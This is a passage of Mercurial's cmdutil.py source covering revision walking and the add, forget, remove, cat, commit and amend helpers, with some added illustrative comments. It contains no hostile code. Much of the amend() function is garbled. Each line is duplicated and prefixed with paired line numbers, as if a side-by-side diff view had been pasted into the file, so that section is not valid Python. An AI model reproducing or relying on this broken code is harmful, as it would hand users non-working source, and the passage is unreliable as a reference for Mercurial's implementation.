            revs.append((linkrev, parentlinkrevs,
                         follow and filelog.renamed(n)))

        return reversed(revs)
    def iterfiles():
        pctx = repo['.']
        for filename in match.files():
            if follow:
                if filename not in pctx:
                    raise error.Abort(_('cannot follow file not in parent '
                                        'revision: "%s"') % filename)
                yield filename, pctx[filename].filenode()
            else:
                yield filename, None
        for filename_node in copies:
            yield filename_node

    for file_, node in iterfiles():
        filelog = repo.file(file_)
        if not len(filelog):
            if node is None:
                # A zero count may be a directory or deleted file, so
                # try to find matching entries on the slow path.
                if follow:
                    raise error.Abort(
                        _('cannot follow nonexistent file: "%s"') % file_)
                raise FileWalkError("Cannot walk via filelog")
            else:
                continue

        if node is None:
            last = len(filelog) - 1
        else:
            last = filelog.rev(node)

        # keep track of all ancestors of the file
        ancestors = {filelog.linkrev(last)}

        # iterate from latest to oldest revision
        for rev, flparentlinkrevs, copied in filerevgen(filelog, last):
            if not follow:
                if rev > maxrev:
                    continue
            else:
                # Note that last might not be the first interesting
                # rev to us:
                # if the file has been changed after maxrev, we'll
                # have linkrev(last) > maxrev, and we still need
                # to explore the file graph
                if rev not in ancestors:
                    continue
                # XXX insert 1327 fix here
                if flparentlinkrevs:
                    ancestors.update(flparentlinkrevs)

            fncache.setdefault(rev, []).append(file_)
            wanted.add(rev)
            if copied:
                copies.append(copied)

    return wanted
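
# Illustrative contract (hypothetical values): on success the returned set
# holds the changelog revs that touch the matched files, and fncache gains
# rev -> [filenames] entries as a side effect, e.g. {3: ['somedir/foo']}.
# A path with an empty filelog (typically a directory or a file that never
# existed) raises FileWalkError so the caller can fall back to scanning
# the changelog.
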
class _followfilter(object):
    def __init__(self, repo, onlyfirst=False):
        self.repo = repo
        self.startrev = nullrev
        self.roots = set()
        self.onlyfirst = onlyfirst

    def match(self, rev):
        def realparents(rev):
            if self.onlyfirst:
                return self.repo.changelog.parentrevs(rev)[0:1]
            else:
                return filter(lambda x: x != nullrev,
                              self.repo.changelog.parentrevs(rev))

        if self.startrev == nullrev:
            self.startrev = rev
            return True

        if rev > self.startrev:
            # forward: all descendants
            if not self.roots:
                self.roots.add(self.startrev)
            for parent in realparents(rev):
                if parent in self.roots:
                    self.roots.add(rev)
                    return True
        else:
            # backwards: all parents
            if not self.roots:
                self.roots.update(realparents(self.startrev))
            if rev in self.roots:
                self.roots.remove(rev)
                self.roots.update(realparents(rev))
                return True

        return False
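
# Illustrative sketch: feed revisions to match() in one direction only.
# For a linear history 0-1-2-3, starting at rev 2 and walking backwards:
#
#   ff = _followfilter(repo)
#   [ff.match(r) for r in (2, 1, 0)]   # -> [True, True, True]
#
# A rev that is not an ancestor of the start rev would return False and
# be filtered out.
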
def walkchangerevs(repo, match, opts, prepare):
    '''Iterate over files and the revs in which they changed.

    Callers most commonly need to iterate backwards over the history
    in which they are interested. Doing so has awful (quadratic-looking)
    performance, so we use iterators in a "windowed" way.

    We walk a window of revisions in the desired order. Within the
    window, we first walk forwards to gather data, then in the desired
    order (usually backwards) to display it.

    This function returns an iterator yielding contexts. Before
    yielding each context, the iterator will first call the prepare
    function on each context in the window in forward order.'''

    allfiles = opts.get('allfiles')
    follow = opts.get('follow') or opts.get('follow_first')
    revs = _walkrevs(repo, opts)
    if not revs:
        return []
    if allfiles and len(revs) > 1:
        raise error.Abort(_("multiple revisions not supported with --allfiles"))
    wanted = set()
    slowpath = match.anypats() or (not match.always() and opts.get('removed'))
    fncache = {}
    change = repo.__getitem__

    # First step is to fill wanted, the set of revisions that we want to yield.
    # When it does not induce extra cost, we also fill fncache for revisions in
    # wanted: a cache of filenames that were changed (ctx.files()) and that
    # match the file filtering conditions.

    if match.always():
        # No files, no patterns. Display all revs.
        wanted = revs
    elif not slowpath:
        # We only have to read through the filelog to find wanted revisions

        try:
            wanted = walkfilerevs(repo, match, follow, revs, fncache)
        except FileWalkError:
            slowpath = True

            # We decided to fall back to the slowpath because at least one
            # of the paths was not a file. Check to see if at least one of them
            # existed in history, otherwise simply return
            for path in match.files():
                if path == '.' or path in repo.store:
                    break
            else:
                return []

    if slowpath:
        # We have to read the changelog to match filenames against
        # changed files

        if follow:
            raise error.Abort(_('can only follow copies/renames for explicit '
                                'filenames'))

        # The slow path checks files modified in every changeset.
        # This is really slow on large repos, so compute the set lazily.
        class lazywantedset(object):
            def __init__(self):
                self.set = set()
                self.revs = set(revs)

            # No need to worry about locality here because it will be accessed
            # in the same order as the increasing window below.
            def __contains__(self, value):
                if value in self.set:
                    return True
                elif value not in self.revs:
                    return False
                else:
                    self.revs.discard(value)
                    ctx = change(value)
                    matches = [f for f in ctx.files() if match(f)]
                    if matches:
                        fncache[value] = matches
                        self.set.add(value)
                        return True
                    return False

            def discard(self, value):
                self.revs.discard(value)
                self.set.discard(value)

        wanted = lazywantedset()

    # it might be worthwhile to do this in the iterator if the rev range
    # is descending and the prune args are all within that range
    for rev in opts.get('prune', ()):
        rev = repo[rev].rev()
        ff = _followfilter(repo)
        stop = min(revs[0], revs[-1])
        for x in xrange(rev, stop - 1, -1):
            if ff.match(x):
                wanted = wanted - [x]

    # Now that wanted is correctly initialized, we can iterate over the
    # revision range, yielding only revisions in wanted.
    def iterate():
        if follow and match.always():
            ff = _followfilter(repo, onlyfirst=opts.get('follow_first'))
            def want(rev):
                return ff.match(rev) and rev in wanted
        else:
            def want(rev):
                return rev in wanted

        it = iter(revs)
        stopiteration = False
        for windowsize in increasingwindows():
            nrevs = []
            for i in xrange(windowsize):
                rev = next(it, None)
                if rev is None:
                    stopiteration = True
                    break
                elif want(rev):
                    nrevs.append(rev)
            for rev in sorted(nrevs):
                fns = fncache.get(rev)
                ctx = change(rev)
                if not fns:
                    def fns_generator():
                        if allfiles:
                            fiter = iter(ctx)
                        else:
                            fiter = ctx.files()
                        for f in fiter:
                            if match(f):
                                yield f
                    fns = fns_generator()
                prepare(ctx, fns)
            for rev in nrevs:
                yield change(rev)

            if stopiteration:
                break

    return iterate()
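
# Illustrative usage (mirroring finddate() above): gather the files each
# matched changeset touches; prepare() runs forward within each window,
# while contexts are yielded in the requested (usually reverse) order:
#
#   touched = {}
#   def prep(ctx, fns):
#       touched[ctx.rev()] = list(fns)
#   for ctx in walkchangerevs(repo, scmutil.matchall(repo),
#                             {'rev': None}, prep):
#       pass
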
def add(ui, repo, match, prefix, explicitonly, **opts):
    join = lambda f: os.path.join(prefix, f)
    bad = []

    badfn = lambda x, y: bad.append(x) or match.bad(x, y)
    names = []
    wctx = repo[None]
    cca = None
    abort, warn = scmutil.checkportabilityalert(ui)
    if abort or warn:
        cca = scmutil.casecollisionauditor(ui, abort, repo.dirstate)

    badmatch = matchmod.badmatch(match, badfn)
    dirstate = repo.dirstate
    # We don't want to just call wctx.walk here, since it would return a lot of
    # clean files, which we aren't interested in and takes time.
    for f in sorted(dirstate.walk(badmatch, subrepos=sorted(wctx.substate),
                                  unknown=True, ignored=False, full=False)):
        exact = match.exact(f)
        if exact or not explicitonly and f not in wctx and repo.wvfs.lexists(f):
            if cca:
                cca(f)
            names.append(f)
            if ui.verbose or not exact:
                ui.status(_('adding %s\n') % match.rel(f))

    for subpath in sorted(wctx.substate):
        sub = wctx.sub(subpath)
        try:
            submatch = matchmod.subdirmatcher(subpath, match)
            if opts.get(r'subrepos'):
                bad.extend(sub.add(ui, submatch, prefix, False, **opts))
            else:
                bad.extend(sub.add(ui, submatch, prefix, True, **opts))
        except error.LookupError:
            ui.status(_("skipping missing subrepository: %s\n")
                      % join(subpath))

    if not opts.get(r'dry_run'):
        rejected = wctx.add(names, prefix)
        bad.extend(f for f in rejected if f in match.files())
    return bad

def addwebdirpath(repo, serverpath, webconf):
    webconf[serverpath] = repo.root
    repo.ui.debug('adding %s = %s\n' % (serverpath, repo.root))

    for r in repo.revs('filelog("path:.hgsub")'):
        ctx = repo[r]
        for subpath in ctx.substate:
            ctx.sub(subpath).addwebdirpath(serverpath, webconf)

def forget(ui, repo, match, prefix, explicitonly, dryrun, interactive):
    if dryrun and interactive:
        raise error.Abort(_("cannot specify both --dry-run and --interactive"))
    join = lambda f: os.path.join(prefix, f)
    bad = []
    badfn = lambda x, y: bad.append(x) or match.bad(x, y)
    wctx = repo[None]
    forgot = []

    s = repo.status(match=matchmod.badmatch(match, badfn), clean=True)
    forget = sorted(s.modified + s.added + s.deleted + s.clean)
    if explicitonly:
        forget = [f for f in forget if match.exact(f)]

    for subpath in sorted(wctx.substate):
        sub = wctx.sub(subpath)
        try:
            submatch = matchmod.subdirmatcher(subpath, match)
            subbad, subforgot = sub.forget(submatch, prefix, dryrun=dryrun,
                                           interactive=interactive)
            bad.extend([subpath + '/' + f for f in subbad])
            forgot.extend([subpath + '/' + f for f in subforgot])
        except error.LookupError:
            ui.status(_("skipping missing subrepository: %s\n")
                      % join(subpath))

    if not explicitonly:
        for f in match.files():
            if f not in repo.dirstate and not repo.wvfs.isdir(f):
                if f not in forgot:
                    if repo.wvfs.exists(f):
                        # Don't complain if the exact case match wasn't given.
                        # But don't do this until after checking 'forgot', so
                        # that subrepo files aren't normalized, and this op is
                        # purely from data cached by the status walk above.
                        if repo.dirstate.normalize(f) in repo.dirstate:
                            continue
                        ui.warn(_('not removing %s: '
                                  'file is already untracked\n')
                                % match.rel(f))
                    bad.append(f)

    if interactive:
        responses = _('[Ynsa?]'
                      '$$ &Yes, forget this file'
                      '$$ &No, skip this file'
                      '$$ &Skip remaining files'
                      '$$ Include &all remaining files'
                      '$$ &? (display help)')
        for filename in forget[:]:
            r = ui.promptchoice(_('forget %s %s') % (filename, responses))
            if r == 4: # ?
                while r == 4:
                    for c, t in ui.extractchoices(responses)[1]:
                        ui.write('%s - %s\n' % (c, encoding.lower(t)))
                    r = ui.promptchoice(_('forget %s %s') % (filename,
                                                             responses))
            if r == 0: # yes
                continue
            elif r == 1: # no
                forget.remove(filename)
            elif r == 2: # Skip
                fnindex = forget.index(filename)
                del forget[fnindex:]
                break
            elif r == 3: # All
                break

    for f in forget:
        if ui.verbose or not match.exact(f) or interactive:
            ui.status(_('removing %s\n') % match.rel(f))

    if not dryrun:
        rejected = wctx.forget(forget, prefix)
        bad.extend(f for f in rejected if f in match.files())
        forgot.extend(f for f in forget if f not in rejected)
    return bad, forgot
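
# Illustrative --interactive transcript (hypothetical files): each
# candidate is offered individually,
#
#   forget foo [Ynsa?] y
#   forget bar [Ynsa?] n
#
# where 'y' forgets the file, 'n' keeps it tracked, 's' stops prompting
# and keeps the rest, 'a' forgets all remaining files, and '?' reprints
# the choices.
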
def files(ui, ctx, m, fm, fmt, subrepos):
    ret = 1

    for f in ctx.matches(m):
        fm.startitem()
        if ui.verbose:
            fc = ctx[f]
            fm.write('size flags', '% 10d % 1s ', fc.size(), fc.flags())
        fm.data(abspath=f)
        fm.write('path', fmt, m.rel(f))
        ret = 0

    for subpath in sorted(ctx.substate):
        submatch = matchmod.subdirmatcher(subpath, m)
        if (subrepos or m.exact(subpath) or any(submatch.files())):
            sub = ctx.sub(subpath)
            try:
                recurse = m.exact(subpath) or subrepos
                if sub.printfiles(ui, submatch, fm, fmt, recurse) == 0:
                    ret = 0
            except error.LookupError:
                ui.status(_("skipping missing subrepository: %s\n")
                          % m.abs(subpath))

    return ret

def remove(ui, repo, m, prefix, after, force, subrepos, dryrun, warnings=None):
    join = lambda f: os.path.join(prefix, f)
    ret = 0
    s = repo.status(match=m, clean=True)
    modified, added, deleted, clean = s[0], s[1], s[3], s[6]

    wctx = repo[None]

    if warnings is None:
        warnings = []
        warn = True
    else:
        warn = False

    subs = sorted(wctx.substate)
    progress = ui.makeprogress(_('searching'), total=len(subs),
                               unit=_('subrepos'))
    for subpath in subs:
        submatch = matchmod.subdirmatcher(subpath, m)
        if subrepos or m.exact(subpath) or any(submatch.files()):
            progress.increment()
            sub = wctx.sub(subpath)
            try:
                if sub.removefiles(submatch, prefix, after, force, subrepos,
                                   dryrun, warnings):
                    ret = 1
            except error.LookupError:
                warnings.append(_("skipping missing subrepository: %s\n")
                                % join(subpath))
    progress.complete()

    # warn about failure to delete explicit files/dirs
    deleteddirs = util.dirs(deleted)
    files = m.files()
    progress = ui.makeprogress(_('deleting'), total=len(files),
                               unit=_('files'))
    for f in files:
        def insubrepo():
            for subpath in wctx.substate:
                if f.startswith(subpath + '/'):
                    return True
            return False

        progress.increment()
        isdir = f in deleteddirs or wctx.hasdir(f)
        if (f in repo.dirstate or isdir or f == '.'
            or insubrepo() or f in subs):
            continue

        if repo.wvfs.exists(f):
            if repo.wvfs.isdir(f):
                warnings.append(_('not removing %s: no tracked files\n')
                                % m.rel(f))
            else:
                warnings.append(_('not removing %s: file is untracked\n')
                                % m.rel(f))
            # missing files will generate a warning elsewhere
            ret = 1
    progress.complete()

    if force:
        list = modified + deleted + clean + added
    elif after:
        list = deleted
        remaining = modified + added + clean
        progress = ui.makeprogress(_('skipping'), total=len(remaining),
                                   unit=_('files'))
        for f in remaining:
            progress.increment()
            if ui.verbose or (f in files):
                warnings.append(_('not removing %s: file still exists\n')
                                % m.rel(f))
                ret = 1
        progress.complete()
    else:
        list = deleted + clean
        progress = ui.makeprogress(_('skipping'),
                                   total=(len(modified) + len(added)),
                                   unit=_('files'))
        for f in modified:
            progress.increment()
            warnings.append(_('not removing %s: file is modified (use -f'
                              ' to force removal)\n') % m.rel(f))
            ret = 1
        for f in added:
            progress.increment()
            warnings.append(_("not removing %s: file has been marked for add"
                              " (use 'hg forget' to undo add)\n") % m.rel(f))
            ret = 1
        progress.complete()

    list = sorted(list)
    progress = ui.makeprogress(_('deleting'), total=len(list),
                               unit=_('files'))
    for f in list:
        if ui.verbose or not m.exact(f):
            progress.increment()
            ui.status(_('removing %s\n') % m.rel(f))
    progress.complete()

    if not dryrun:
        with repo.wlock():
            if not after:
                for f in list:
                    if f in added:
                        continue # we never unlink added files on remove
                    rmdir = repo.ui.configbool('experimental',
                                               'removeemptydirs')
                    repo.wvfs.unlinkpath(f, ignoremissing=True, rmdir=rmdir)
            repo[None].forget(list)

    if warn:
        for warning in warnings:
            ui.warn(warning)

    return ret
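
# Illustrative effect of the rmdir flag above (hypothetical paths): with
# the default experimental.removeemptydirs=1, unlinking the last tracked
# file also prunes its now-empty parent directory; running
#
#   hg rm --config experimental.removeemptydirs=0 dir/onlyfile
#
# unlinks the file but deliberately leaves the empty directory in place.
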
def _updatecatformatter(fm, ctx, matcher, path, decode):
    """Hook for adding data to the formatter used by ``hg cat``.

    Extensions (e.g., lfs) can wrap this to inject keywords/data, but must call
    this method first."""
    data = ctx[path].data()
    if decode:
        data = ctx.repo().wwritedata(path, data)
    fm.startitem()
    fm.write('data', '%s', data)
    fm.data(abspath=path, path=matcher.rel(path))

def cat(ui, repo, ctx, matcher, basefm, fntemplate, prefix, **opts):
    err = 1
    opts = pycompat.byteskwargs(opts)

    def write(path):
        filename = None
        if fntemplate:
            filename = makefilename(ctx, fntemplate,
                                    pathname=os.path.join(prefix, path))
            # attempt to create the directory if it does not already exist
            try:
                os.makedirs(os.path.dirname(filename))
            except OSError:
                pass
        with formatter.maybereopen(basefm, filename) as fm:
            _updatecatformatter(fm, ctx, matcher, path, opts.get('decode'))

    # Automation often uses hg cat on single files, so special case it
    # for performance to avoid the cost of parsing the manifest.
    if len(matcher.files()) == 1 and not matcher.anypats():
        file = matcher.files()[0]
        mfl = repo.manifestlog
        mfnode = ctx.manifestnode()
        try:
            if mfnode and mfl[mfnode].find(file)[0]:
                scmutil.prefetchfiles(repo, [ctx.rev()], matcher)
                write(file)
                return 0
        except KeyError:
            pass

    scmutil.prefetchfiles(repo, [ctx.rev()], matcher)

    for abs in ctx.walk(matcher):
        write(abs)
        err = 0

    for subpath in sorted(ctx.substate):
        sub = ctx.sub(subpath)
        try:
            submatch = matchmod.subdirmatcher(subpath, matcher)

            if not sub.cat(submatch, basefm, fntemplate,
                           os.path.join(prefix, sub._path),
                           **pycompat.strkwargs(opts)):
                err = 0
        except error.RepoLookupError:
            ui.status(_("skipping missing subrepository: %s\n")
                      % os.path.join(prefix, subpath))

    return err
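
# Illustrative command-level behavior (hypothetical paths): with a file
# template, each matched file goes to its own destination, e.g.
#
#   hg cat -r . -o 'export/%p' 'glob:**.py'
#
# expands %p to the repository-relative path; without -o everything is
# written to the shared formatter (normally stdout).
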
def commit(ui, repo, commitfunc, pats, opts):
    '''commit the specified files or all outstanding changes'''
    date = opts.get('date')
    if date:
        opts['date'] = dateutil.parsedate(date)
    message = logmessage(ui, opts)
    matcher = scmutil.match(repo[None], pats, opts)

    dsguard = None
    # extract addremove carefully -- this function can be called from a command
    # that doesn't support addremove
    if opts.get('addremove'):
        dsguard = dirstateguard.dirstateguard(repo, 'commit')
    with dsguard or util.nullcontextmanager():
        if dsguard:
            if scmutil.addremove(repo, matcher, "", opts) != 0:
                raise error.Abort(
                    _("failed to mark all new/missing files as added/removed"))

        return commitfunc(ui, repo, message, matcher, opts)

def samefile(f, ctx1, ctx2):
    if f in ctx1.manifest():
        a = ctx1.filectx(f)
        if f in ctx2.manifest():
            b = ctx2.filectx(f)
            return (not a.cmp(b)
                    and a.flags() == b.flags())
        else:
            return False
    else:
        return f not in ctx2.manifest()
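
# Illustrative truth table: samefile(f, ctx1, ctx2) is True when f is
# present in both manifests with identical contents and flags, or absent
# from both; any one-sided presence or content/flag difference is False.
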
2378 def amend(ui, repo, old, extra, pats, opts):
2381 def amend(ui, repo, old, extra, pats, opts):
2379 # avoid cycle context -> subrepo -> cmdutil
2382 # avoid cycle context -> subrepo -> cmdutil
2380 from . import context
2383 from . import context
2381
2384
2382 # amend will reuse the existing user if not specified, but the obsolete
2385 # amend will reuse the existing user if not specified, but the obsolete
2383 # marker creation requires that the current user's name is specified.
2386 # marker creation requires that the current user's name is specified.
2384 if obsolete.isenabled(repo, obsolete.createmarkersopt):
2387 if obsolete.isenabled(repo, obsolete.createmarkersopt):
2385 ui.username() # raise exception if username not set
2388 ui.username() # raise exception if username not set
2386
2389
2387 ui.note(_('amending changeset %s\n') % old)
2390 ui.note(_('amending changeset %s\n') % old)
2388 base = old.p1()
2391 base = old.p1()
2389
2392
2390 with repo.wlock(), repo.lock(), repo.transaction('amend'):
2393 with repo.wlock(), repo.lock(), repo.transaction('amend'):
2391 # Participating changesets:
2394 # Participating changesets:
2392 #
2395 #
2393 # wctx o - workingctx that contains changes from working copy
2396 # wctx o - workingctx that contains changes from working copy
2394 # | to go into amending commit
2397 # | to go into amending commit
2395 # |
2398 # |
2396 # old o - changeset to amend
2399 # old o - changeset to amend
2397 # |
2400 # |
2398 # base o - first parent of the changeset to amend
2401 # base o - first parent of the changeset to amend
2399 wctx = repo[None]
2402 wctx = repo[None]
2400
2403
2401 # Copy to avoid mutating input
2404 # Copy to avoid mutating input
2402 extra = extra.copy()
2405 extra = extra.copy()
2403 # Update extra dict from amended commit (e.g. to preserve graft
2406 # Update extra dict from amended commit (e.g. to preserve graft
2404 # source)
2407 # source)
2405 extra.update(old.extra())
2408 extra.update(old.extra())
2406
2409
2407 # Also update it from the from the wctx
2410 # Also update it from the from the wctx
2408 extra.update(wctx.extra())
2411 extra.update(wctx.extra())
2409
2412
2410 user = opts.get('user') or old.user()
2413 user = opts.get('user') or old.user()
2411 date = opts.get('date') or old.date()
2414 date = opts.get('date') or old.date()
2412
2415
2413 # Parse the date to allow comparison between date and old.date()
2416 # Parse the date to allow comparison between date and old.date()
2414 date = dateutil.parsedate(date)
2417 date = dateutil.parsedate(date)
2415
2418
2416 if len(old.parents()) > 1:
2419 if len(old.parents()) > 1:
2417 # ctx.files() isn't reliable for merges, so fall back to the
2420 # ctx.files() isn't reliable for merges, so fall back to the
2418 # slower repo.status() method
2421 # slower repo.status() method
2419 files = set([fn for st in repo.status(base, old)[:3]
2422 files = set([fn for st in repo.status(base, old)[:3]
2420 for fn in st])
2423 for fn in st])
2421 else:
2424 else:
2422 files = set(old.files())
2425 files = set(old.files())
2423
2426
2424 # add/remove the files to the working copy if the "addremove" option
2427 # add/remove the files to the working copy if the "addremove" option
2425 # was specified.
2428 # was specified.
2426 matcher = scmutil.match(wctx, pats, opts)
2429 matcher = scmutil.match(wctx, pats, opts)
2427 if (opts.get('addremove')
2430 if (opts.get('addremove')
2428 and scmutil.addremove(repo, matcher, "", opts)):
2431 and scmutil.addremove(repo, matcher, "", opts)):
2429 raise error.Abort(
2432 raise error.Abort(
2430 _("failed to mark all new/missing files as added/removed"))
2433 _("failed to mark all new/missing files as added/removed"))
2431
2434
2432 # Check subrepos. This depends on in-place wctx._status update in
2435 # Check subrepos. This depends on in-place wctx._status update in
2433 # subrepo.precommit(). To minimize the risk of this hack, we do
2436 # subrepo.precommit(). To minimize the risk of this hack, we do
2434 # nothing if .hgsub does not exist.
2437 # nothing if .hgsub does not exist.
2435 if '.hgsub' in wctx or '.hgsub' in old:
2438 if '.hgsub' in wctx or '.hgsub' in old:
2436 subs, commitsubs, newsubstate = subrepoutil.precommit(
2439 subs, commitsubs, newsubstate = subrepoutil.precommit(
2437 ui, wctx, wctx._status, matcher)
2440 ui, wctx, wctx._status, matcher)
2438 # amend should abort if commitsubrepos is enabled
2441 # amend should abort if commitsubrepos is enabled
2439 assert not commitsubs
2442 assert not commitsubs
2440 if subs:
2443 if subs:
2441 subrepoutil.writestate(repo, newsubstate)
2444 subrepoutil.writestate(repo, newsubstate)
2442
2445
2443 ms = mergemod.mergestate.read(repo)
2446 ms = mergemod.mergestate.read(repo)
2444 mergeutil.checkunresolved(ms)
2447 mergeutil.checkunresolved(ms)
2445
2448
2446 filestoamend = set(f for f in wctx.files() if matcher(f))
2449 filestoamend = set(f for f in wctx.files() if matcher(f))
2447
2450
2448 changes = (len(filestoamend) > 0)
2451 changes = (len(filestoamend) > 0)
2449 if changes:
2452 if changes:
2450 # Recompute copies (avoid recording a -> b -> a)
2453 # Recompute copies (avoid recording a -> b -> a)
2451 copied = copies.pathcopies(base, wctx, matcher)
2454 copied = copies.pathcopies(base, wctx, matcher)
2452 if old.p2:
2455 if old.p2:
2453 copied.update(copies.pathcopies(old.p2(), wctx, matcher))
2456 copied.update(copies.pathcopies(old.p2(), wctx, matcher))
2454
2457
2455 # Prune files which were reverted by the updates: if old
2458 # Prune files which were reverted by the updates: if old
2456 # introduced file X and the file was renamed in the working
2459 # introduced file X and the file was renamed in the working
2457 # copy, then those two files are the same and
2460 # copy, then those two files are the same and
2458 # we can discard X from our list of files. Likewise if X
2461 # we can discard X from our list of files. Likewise if X
2459 # was removed, it's no longer relevant. If X is missing (aka
2462 # was removed, it's no longer relevant. If X is missing (aka
2460 # deleted), old X must be preserved.
2463 # deleted), old X must be preserved.
2461 files.update(filestoamend)
2464 files.update(filestoamend)
2462 files = [f for f in files if (not samefile(f, wctx, base)
2465 files = [f for f in files if (not samefile(f, wctx, base)
2463 or f in wctx.deleted())]
2466 or f in wctx.deleted())]
2464
2467
2465 def filectxfn(repo, ctx_, path):
2468 def filectxfn(repo, ctx_, path):
2466 try:
2469 try:
2467 # If the file being considered is not amongst the files
2470 # If the file being considered is not amongst the files
2468 # to be amended, we should return the file context from the
2471 # to be amended, we should return the file context from the
2469 # old changeset. This avoids issues when only some files in
2472 # old changeset. This avoids issues when only some files in
2470 # the working copy are being amended but there are also
2473 # the working copy are being amended but there are also
2471 # changes to other files from the old changeset.
2474 # changes to other files from the old changeset.
2472 if path not in filestoamend:
2475 if path not in filestoamend:
2473 return old.filectx(path)
2476 return old.filectx(path)
2474
2477
2475 # Return None for removed files.
2478 # Return None for removed files.
2476 if path in wctx.removed():
2479 if path in wctx.removed():
2477 return None
2480 return None
2478
2481
2479 fctx = wctx[path]
2482 fctx = wctx[path]
2480 flags = fctx.flags()
2483 flags = fctx.flags()
2481 mctx = context.memfilectx(repo, ctx_,
2484 mctx = context.memfilectx(repo, ctx_,
2482 fctx.path(), fctx.data(),
2485 fctx.path(), fctx.data(),
2483 islink='l' in flags,
2486 islink='l' in flags,
2484 isexec='x' in flags,
2487 isexec='x' in flags,
2485 copied=copied.get(path))
2488 copied=copied.get(path))
2486 return mctx
2489 return mctx
2487 except KeyError:
2490 except KeyError:
2488 return None
2491 return None
2489 else:
2492 else:
2490 ui.note(_('copying changeset %s to %s\n') % (old, base))
2493 ui.note(_('copying changeset %s to %s\n') % (old, base))
2491
2494
2492 # Use version of files as in the old cset
            # Use version of files as in the old cset
            def filectxfn(repo, ctx_, path):
                try:
                    return old.filectx(path)
                except KeyError:
                    return None

        # See if we got a message from -m or -l, if not, open the editor with
        # the message of the changeset to amend.
        message = logmessage(ui, opts)

        editform = mergeeditform(old, 'commit.amend')
        editor = getcommiteditor(editform=editform,
                                 **pycompat.strkwargs(opts))

        if not message:
            editor = getcommiteditor(edit=True, editform=editform)
            message = old.description()

        pureextra = extra.copy()
        extra['amend_source'] = old.hex()

        new = context.memctx(repo,
                             parents=[base.node(), old.p2().node()],
                             text=message,
                             files=files,
                             filectxfn=filectxfn,
                             user=user,
                             date=date,
                             extra=extra,
                             editor=editor)

        newdesc = changelog.stripdesc(new.description())
        if ((not changes)
            and newdesc == old.description()
            and user == old.user()
            and date == old.date()
            and pureextra == old.extra()):
            # nothing changed. continuing here would create a new node
            # anyway because of the amend_source noise.
            #
            # This is not what we expect from amend.
            return old.node()

        commitphase = None
        if opts.get('secret'):
            commitphase = phases.secret
        newid = repo.commitctx(new)

        # Reroute the working copy parent to the new changeset
        repo.setparents(newid, nullid)
        mapping = {old.node(): (newid,)}
        obsmetadata = None
        if opts.get('note'):
            obsmetadata = {'note': opts['note']}
        scmutil.cleanupnodes(repo, mapping, 'amend', metadata=obsmetadata,
                             fixphase=True, targetphase=commitphase)

        # Fixing the dirstate because localrepo.commitctx does not update
        # it. This is rather convenient because we did not need to update
        # the dirstate for all the files in the new commit which commitctx
        # could have done if it updated the dirstate. Now, we can
        # selectively update the dirstate only for the amended files.
        dirstate = repo.dirstate

        # Update the state of the files which were added and modified in the
        # amend to "normal" in the dirstate.
        normalfiles = set(wctx.modified() + wctx.added()) & filestoamend
        for f in normalfiles:
            dirstate.normal(f)

        # Update the state of files which were removed in the amend
        # to "removed" in the dirstate.
        removedfiles = set(wctx.removed()) & filestoamend
        for f in removedfiles:
            dirstate.drop(f)

    return newid

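# --- editorial sketch, not part of cmdutil.py --------------------------------
# memctx calls the filectxfn above once per path in `files`; returning None
# (the KeyError branch) marks that path as removed in the new revision. A
# hedged toy callback -- `makefilectxfn` and the `contents` dict are
# illustrative names, not Mercurial API:
def makefilectxfn(contents):
    def filectxfn(repo, memctx, path):
        if path not in contents:
            return None  # absent key: the file is deleted in the new revision
        return context.memfilectx(repo, memctx, path, contents[path])
    return filectxfn
# ------------------------------------------------------------------------------
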
def commiteditor(repo, ctx, subs, editform=''):
    if ctx.description():
        return ctx.description()
    return commitforceeditor(repo, ctx, subs, editform=editform,
                             unchangedmessagedetection=True)

def commitforceeditor(repo, ctx, subs, finishdesc=None, extramsg=None,
                      editform='', unchangedmessagedetection=False):
    if not extramsg:
        extramsg = _("Leave message empty to abort commit.")

    forms = [e for e in editform.split('.') if e]
    forms.insert(0, 'changeset')
    templatetext = None
    while forms:
        ref = '.'.join(forms)
        if repo.ui.config('committemplate', ref):
            templatetext = committext = buildcommittemplate(
                repo, ctx, subs, extramsg, ref)
            break
        forms.pop()
    else:
        committext = buildcommittext(repo, ctx, subs, extramsg)

    # run editor in the repository root
    olddir = pycompat.getcwd()
    os.chdir(repo.root)

    # make in-memory changes visible to external process
    tr = repo.currenttransaction()
    repo.dirstate.write(tr)
    pending = tr and tr.writepending() and repo.root

    editortext = repo.ui.edit(committext, ctx.user(), ctx.extra(),
                              editform=editform, pending=pending,
                              repopath=repo.path, action='commit')
    text = editortext

    # strip away anything below this special string (used for editors that want
    # to display the diff)
    stripbelow = re.search(_linebelow, text, flags=re.MULTILINE)
    if stripbelow:
        text = text[:stripbelow.start()]

    text = re.sub("(?m)^HG:.*(\n|$)", "", text)
    os.chdir(olddir)

    if finishdesc:
        text = finishdesc(text)
    if not text.strip():
        raise error.Abort(_("empty commit message"))
    if unchangedmessagedetection and editortext == templatetext:
        raise error.Abort(_("commit message unchanged"))

    return text

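# --- editorial sketch, not part of cmdutil.py --------------------------------
# The while-forms loop above probes committemplate keys from most to least
# specific before falling back to buildcommittext. A standalone illustration
# of the candidate order it tries:
def templaterefs(editform):
    forms = [e for e in editform.split('.') if e]
    forms.insert(0, 'changeset')
    while forms:
        yield '.'.join(forms)  # e.g. 'changeset.commit.amend', then shorter
        forms.pop()
# list(templaterefs('commit.amend')) ->
# ['changeset.commit.amend', 'changeset.commit', 'changeset']
# ------------------------------------------------------------------------------
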
def buildcommittemplate(repo, ctx, subs, extramsg, ref):
    ui = repo.ui
    spec = formatter.templatespec(ref, None, None)
    t = logcmdutil.changesettemplater(ui, repo, spec)
    t.t.cache.update((k, templater.unquotestring(v))
                     for k, v in repo.ui.configitems('committemplate'))

    if not extramsg:
        extramsg = '' # ensure that extramsg is a string

    ui.pushbuffer()
    t.show(ctx, extramsg=extramsg)
    return ui.popbuffer()

def hgprefix(msg):
    return "\n".join(["HG: %s" % a for a in msg.split("\n") if a])

def buildcommittext(repo, ctx, subs, extramsg):
    edittext = []
    modified, added, removed = ctx.modified(), ctx.added(), ctx.removed()
    if ctx.description():
        edittext.append(ctx.description())
    edittext.append("")
    edittext.append("") # Empty line between message and comments.
    edittext.append(hgprefix(_("Enter commit message."
                               " Lines beginning with 'HG:' are removed.")))
    edittext.append(hgprefix(extramsg))
    edittext.append("HG: --")
    edittext.append(hgprefix(_("user: %s") % ctx.user()))
    if ctx.p2():
        edittext.append(hgprefix(_("branch merge")))
    if ctx.branch():
        edittext.append(hgprefix(_("branch '%s'") % ctx.branch()))
    if bookmarks.isactivewdirparent(repo):
        edittext.append(hgprefix(_("bookmark '%s'") % repo._activebookmark))
